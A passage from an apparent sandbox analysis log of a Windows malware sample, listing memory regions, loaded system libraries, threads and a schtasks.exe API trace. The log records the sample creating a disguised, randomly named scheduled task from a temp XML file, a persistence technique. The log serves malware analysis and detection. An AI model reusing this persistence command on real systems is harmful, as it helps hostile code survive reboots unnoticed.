"crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2225 start_va = 0x7ffb54040000 end_va = 0x7ffb540c5fff monitored = 0 entry_point = 0x7ffb5404d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2226 start_va = 0x7ffb540d0000 end_va = 0x7ffb54139fff monitored = 0 entry_point = 0x7ffb54106d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2227 start_va = 0x7ffb54200000 end_va = 0x7ffb54242fff monitored = 0 entry_point = 0x7ffb54214b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2228 start_va = 0x7ffb543d0000 end_va = 0x7ffb5464cfff monitored = 0 entry_point = 0x7ffb544a4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2229 start_va = 0x7ffb54670000 end_va = 0x7ffb54677fff monitored = 0 entry_point = 0x7ffb54671ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2230 start_va = 0x7ffb54680000 end_va = 0x7ffb547d5fff monitored = 0 entry_point = 0x7ffb5468a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2231 start_va = 0x7ffb54840000 end_va = 0x7ffb548dcfff monitored = 0 entry_point = 0x7ffb548478a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2232 start_va = 0x7ffb548e0000 end_va = 0x7ffb54a65fff monitored = 0 entry_point = 0x7ffb5492ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2233 start_va = 0x7ffb54a70000 end_va = 0x7ffb54adafff monitored = 0 entry_point = 0x7ffb54a890c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2234 start_va = 0x7ffb54e50000 end_va = 0x7ffb54f92fff monitored = 0 entry_point = 0x7ffb54e78210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2235 start_va = 0x7ffb54fa0000 end_va = 0x7ffb55046fff monitored = 0 entry_point = 0x7ffb54fb58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2236 start_va = 0x7ffb55050000 end_va = 0x7ffb550fcfff monitored = 0 entry_point = 0x7ffb550681a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2237 start_va = 0x7ffb55100000 end_va = 0x7ffb5515afff monitored = 0 entry_point = 0x7ffb551138b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2238 start_va = 0x7ffb55160000 end_va = 0x7ffb5527bfff monitored = 0 entry_point = 0x7ffb551a02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2239 start_va = 0x7ffb55280000 end_va = 0x7ffb55326fff monitored = 0 entry_point = 0x7ffb5528b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2240 start_va = 0x7ffb56cd0000 end_va = 0x7ffb56d90fff monitored = 0 entry_point = 0x7ffb56cf0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2241 start_va = 0x7ffb56e50000 end_va = 0x7ffb57010fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2269 start_va = 0x17efc1e0000 end_va = 0x17efc246fff monitored = 0 entry_point = 0x17efc22f030 region_type = mapped_file name = "fwpkclnt.sys" filename = "\\Windows\\System32\\drivers\\FWPKCLNT.SYS" (normalized: "c:\\windows\\system32\\drivers\\fwpkclnt.sys") Region: id = 2279 start_va = 0x17efd300000 end_va = 0x17efd3d9fff monitored = 0 entry_point = 0x17efd333c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 2326 start_va = 0x1ef0f80000 end_va = 0x1ef107ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001ef0f80000" filename = "" Region: id = 2327 start_va = 0x1ef1080000 end_va = 0x1ef117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001ef1080000" filename = "" Region: id = 2688 start_va = 0x17efd300000 end_va = 0x17efd44cfff monitored = 0 entry_point = 0x17efd343da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 2689 start_va = 0x17efc940000 end_va = 0x17efc9fbfff monitored = 0 entry_point = 0x17efc97c480 region_type = mapped_file name = "lsm.dll" filename = "\\Windows\\System32\\lsm.dll" (normalized: "c:\\windows\\system32\\lsm.dll") Thread: id = 162 os_tid = 0x4c0 Thread: id = 163 os_tid = 0x878 Thread: id = 164 os_tid = 0xd58 Thread: id = 165 os_tid = 0xd54 Thread: id = 166 os_tid = 0xd50 Thread: id = 167 os_tid = 0xce4 Thread: id = 168 os_tid = 0x600 Thread: id = 169 os_tid = 0x424 Thread: id = 170 os_tid = 0x37c Thread: id = 171 os_tid = 0x230 Thread: id = 172 os_tid = 0x2f0 Thread: id = 173 os_tid = 0x87c Thread: id = 174 os_tid = 0x450 Thread: id = 175 os_tid = 0x428 Thread: id = 176 os_tid = 0x40c Thread: id = 177 os_tid = 0x408 Thread: id = 178 os_tid = 0x28c Thread: id = 179 os_tid = 0x27c Thread: id = 180 os_tid = 0x8 Thread: id = 181 os_tid = 0x148 Thread: id = 182 os_tid = 0x128 Thread: id = 183 os_tid = 0x124 Thread: id = 184 os_tid = 0x3ec Thread: id = 185 os_tid = 0x378 Thread: id = 194 os_tid = 0x107c Thread: id = 195 os_tid = 0x1080 Process: id = "8" image_name = "schtasks.exe" filename = "c:\\windows\\syswow64\\schtasks.exe" page_root = "0x2f2000" os_pid = "0x124c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xe48" cmd_line = "\"C:\\Windows\\System32\\schtasks.exe\" /Create /TN \"Updates\\xaFodrmIsC\" /XML \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpB75D.tmp\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fc8c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2421 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2422 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2423 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2424 start_va = 0x90000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 2425 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2426 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2427 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2428 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2429 start_va = 0x400000 end_va = 0x401fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2430 start_va = 0xf50000 end_va = 0xf81fff monitored = 1 entry_point = 0xf705b0 region_type = mapped_file name = "schtasks.exe" filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe") Region: id = 2431 start_va = 0xf90000 end_va = 0x4f8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f90000" filename = "" Region: id = 2432 start_va = 0x77840000 end_va = 0x779bafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2433 start_va = 0x7ece0000 end_va = 0x7ed02fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ece0000" filename = "" Region: id = 2434 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2435 start_va = 0x7fff0000 end_va = 0x7dfb56e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2436 start_va = 0x7dfb56e50000 end_va = 0x7ffb56e4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb56e50000" filename = "" Region: id = 2437 start_va = 0x7ffb56e50000 end_va = 0x7ffb57010fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2438 start_va = 0x7ffb57011000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb57011000" filename = "" Region: id = 2439 start_va = 0x100000 end_va = 0x11ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2440 start_va = 0x52570000 end_va = 0x525bffff monitored = 0 entry_point = 0x52588180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2441 start_va = 0x524f0000 end_va = 0x52569fff monitored = 0 entry_point = 0x52503290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2442 start_va = 0x76b60000 end_va = 0x76c3ffff monitored = 0 entry_point = 0x76b73980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2443 start_va = 0x525c0000 end_va = 0x525c7fff monitored = 0 entry_point = 0x525c17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2444 start_va = 0x410000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 2445 start_va = 0x76b60000 end_va = 0x76c3ffff monitored = 0 entry_point = 0x76b73980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2446 start_va = 0x771a0000 end_va = 0x7731dfff monitored = 0 entry_point = 0x77251b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2447 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2448 start_va = 0x7ebe0000 end_va = 0x7ecdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ebe0000" filename = "" Region: id = 2528 start_va = 0x120000 end_va = 0x1ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2529 start_va = 0x400000 end_va = 0x403fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2530 start_va = 0x74ad0000 end_va = 0x74b8dfff monitored = 0 entry_point = 0x74b05630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2531 start_va = 0x410000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 2532 start_va = 0x450000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 2533 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2534 start_va = 0x77070000 end_va = 0x77101fff monitored = 0 entry_point = 0x770a8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2535 start_va = 0x77370000 end_va = 0x7752cfff monitored = 0 entry_point = 0x77452a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2536 start_va = 0x76dc0000 end_va = 0x76e6cfff monitored = 0 entry_point = 0x76dd4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2537 start_va = 0x74570000 end_va = 0x7458dfff monitored = 0 entry_point = 0x7457b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2538 start_va = 0x74560000 end_va = 0x74569fff monitored = 0 entry_point = 0x74562a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2539 start_va = 0x745b0000 end_va = 0x74607fff monitored = 0 entry_point = 0x745f25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2540 start_va = 0x76ec0000 end_va = 0x76f03fff monitored = 0 entry_point = 0x76ed9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2541 start_va = 0x490000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 2542 start_va = 0x490000 end_va = 0x579fff monitored = 0 entry_point = 0x4cd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2543 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 2544 start_va = 0x490000 end_va = 0x4a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "schtasks.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\schtasks.exe.mui") Region: id = 2545 start_va = 0x6c0000 end_va = 0x9f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2546 start_va = 0x74ac0000 end_va = 0x74acbfff monitored = 0 entry_point = 0x74ac3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2547 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 2548 start_va = 0x77110000 end_va = 0x77193fff monitored = 0 entry_point = 0x77136220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2549 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2550 start_va = 0x6b670000 end_va = 0x6b6fbfff monitored = 0 entry_point = 0x6b6aa6c0 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll") Thread: id = 204 os_tid = 0xcc4 [0304.965] GetModuleHandleA (lpModuleName=0x0) returned 0xf50000 [0304.965] __set_app_type (_Type=0x1) [0304.965] __p__fmode () returned 0x74b84d6c [0304.965] __p__commode () returned 0x74b85b1c [0304.965] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf70840) returned 0x0 [0304.966] __wgetmainargs (in: _Argc=0xf7ade0, _Argv=0xf7ade4, _Env=0xf7ade8, _DoWildCard=0, _StartInfo=0xf7adf4 | out: _Argc=0xf7ade0, _Argv=0xf7ade4, _Env=0xf7ade8) returned 0 [0304.967] _onexit (_Func=0xf72bc0) returned 0xf72bc0 [0304.967] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0304.967] WinSqmIsOptedIn () returned 0x0 [0304.967] GetProcessHeap () returned 0x5c0000 [0304.967] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x10) returned 0x5c79f0 [0304.967] RtlRestoreLastWin32Error () returned 0x0 [0304.967] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0304.967] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0304.967] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0304.968] RtlVerifyVersionInfo (VersionInfo=0xcf6d0, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0304.968] GetProcessHeap () returned 0x5c0000 [0304.968] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x10) returned 0x5c7828 [0304.968] lstrlenW (lpString="") returned 0 [0304.968] GetProcessHeap () returned 0x5c0000 [0304.968] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x2) returned 0x5c0598 [0304.968] GetProcessHeap () returned 0x5c0000 [0304.968] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c70f8 [0304.968] GetProcessHeap () returned 0x5c0000 [0304.968] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x10) returned 0x5c7870 [0304.968] GetProcessHeap () returned 0x5c0000 [0304.968] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c6ec0 [0304.968] GetProcessHeap () returned 0x5c0000 [0304.968] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c6ee0 [0304.968] GetProcessHeap () returned 0x5c0000 [0304.968] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c6f00 [0304.968] GetProcessHeap () returned 0x5c0000 [0304.968] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c6af0 [0304.968] GetProcessHeap () returned 0x5c0000 [0304.968] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x10) returned 0x5c79c0 [0304.968] GetProcessHeap () returned 0x5c0000 [0304.968] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c6b10 [0304.968] GetProcessHeap () returned 0x5c0000 [0304.968] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c6b30 [0304.968] GetProcessHeap () returned 0x5c0000 [0304.968] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c6888 [0304.968] GetProcessHeap () returned 0x5c0000 [0304.968] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c68a8 [0304.968] GetProcessHeap () returned 0x5c0000 [0304.969] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x10) returned 0x5c7888 [0304.969] GetProcessHeap () returned 0x5c0000 [0304.969] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c68c8 [0304.969] GetProcessHeap () returned 0x5c0000 [0304.969] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c2a38 [0304.969] GetProcessHeap () returned 0x5c0000 [0304.969] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c2a58 [0304.969] GetProcessHeap () returned 0x5c0000 [0304.969] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c2a78 [0304.969] SetThreadUILanguage (LangId=0x0) returned 0x409 [0305.256] RtlRestoreLastWin32Error () returned 0x0 [0305.256] GetProcessHeap () returned 0x5c0000 [0305.256] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c9978 [0305.256] GetProcessHeap () returned 0x5c0000 [0305.256] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c9938 [0305.256] GetProcessHeap () returned 0x5c0000 [0305.257] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c9958 [0305.257] GetProcessHeap () returned 0x5c0000 [0305.257] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c9998 [0305.257] GetProcessHeap () returned 0x5c0000 [0305.257] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c9918 [0305.257] GetProcessHeap () returned 0x5c0000 [0305.257] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x10) returned 0x5c78a0 [0305.257] _memicmp (_Buf1=0x5c78a0, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.257] GetProcessHeap () returned 0x5c0000 [0305.257] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x208) returned 0x5c8f90 [0305.257] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5c8f90, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0305.257] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xcf7dc | out: lpdwHandle=0xcf7dc) returned 0x76c [0305.260] GetProcessHeap () returned 0x5c0000 [0305.260] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x776) returned 0x5ca220 [0305.260] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x5ca220 | out: lpData=0x5ca220) returned 1 [0305.260] VerQueryValueW (in: pBlock=0x5ca220, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcf7e4, puLen=0xcf7e8 | out: lplpBuffer=0xcf7e4*=0x5ca5d0, puLen=0xcf7e8) returned 1 [0305.263] _memicmp (_Buf1=0x5c78a0, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.263] _vsnwprintf (in: _Buffer=0x5c8f90, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xcf7c8 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0305.263] VerQueryValueW (in: pBlock=0x5ca220, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xcf7f4, puLen=0xcf7f0 | out: lplpBuffer=0xcf7f4*=0x5ca400, puLen=0xcf7f0) returned 1 [0305.263] lstrlenW (lpString="schtasks.exe") returned 12 [0305.263] lstrlenW (lpString="schtasks.exe") returned 12 [0305.263] lstrlenW (lpString=".EXE") returned 4 [0305.263] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0305.264] lstrlenW (lpString="schtasks.exe") returned 12 [0305.264] lstrlenW (lpString=".EXE") returned 4 [0305.264] _memicmp (_Buf1=0x5c78a0, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.264] lstrlenW (lpString="schtasks") returned 8 [0305.264] GetProcessHeap () returned 0x5c0000 [0305.264] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c9798 [0305.264] GetProcessHeap () returned 0x5c0000 [0305.264] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c9858 [0305.264] GetProcessHeap () returned 0x5c0000 [0305.264] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c9658 [0305.264] GetProcessHeap () returned 0x5c0000 [0305.264] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c96b8 [0305.264] GetProcessHeap () returned 0x5c0000 [0305.264] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x10) returned 0x5c78b8 [0305.264] _memicmp (_Buf1=0x5c78b8, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.265] GetProcessHeap () returned 0x5c0000 [0305.265] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0xa0) returned 0x5c91a0 [0305.265] GetProcessHeap () returned 0x5c0000 [0305.265] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c9718 [0305.265] GetProcessHeap () returned 0x5c0000 [0305.265] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c95d8 [0305.265] GetProcessHeap () returned 0x5c0000 [0305.265] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x14) returned 0x5c98d8 [0305.265] GetProcessHeap () returned 0x5c0000 [0305.265] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x10) returned 0x5c7960 [0305.265] _memicmp (_Buf1=0x5c7960, _Buf2=0xf52708, _Size=0x7) returned 0 [0305.265] GetProcessHeap () returned 0x5c0000 [0305.265] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x200) returned 0x5caad0 [0305.265] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x5caad0, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0305.265] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0305.265] GetProcessHeap () returned 0x5c0000 [0305.265] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0xc, Size=0x30) returned 0x5c2840 [0305.266] _vsnwprintf (in: _Buffer=0x5c91a0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xcf7cc | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0305.266] GetProcessHeap () returned 0x5c0000 [0305.266] GetProcessHeap () returned 0x5c0000 [0305.266] HeapValidate (hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ca220) returned 1 [0305.266] GetProcessHeap () returned 0x5c0000 [0305.266] RtlSizeHeap (HeapHandle=0x5c0000, Flags=0x0, MemoryPointer=0x5ca220) returned 0x776 [0305.266] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x5ca220) returned 1 [0305.266] RtlRestoreLastWin32Error () returned 0x0 [0305.266] GetThreadLocale () returned 0x409 [0305.266] CompareStringA (Locale=0x409, 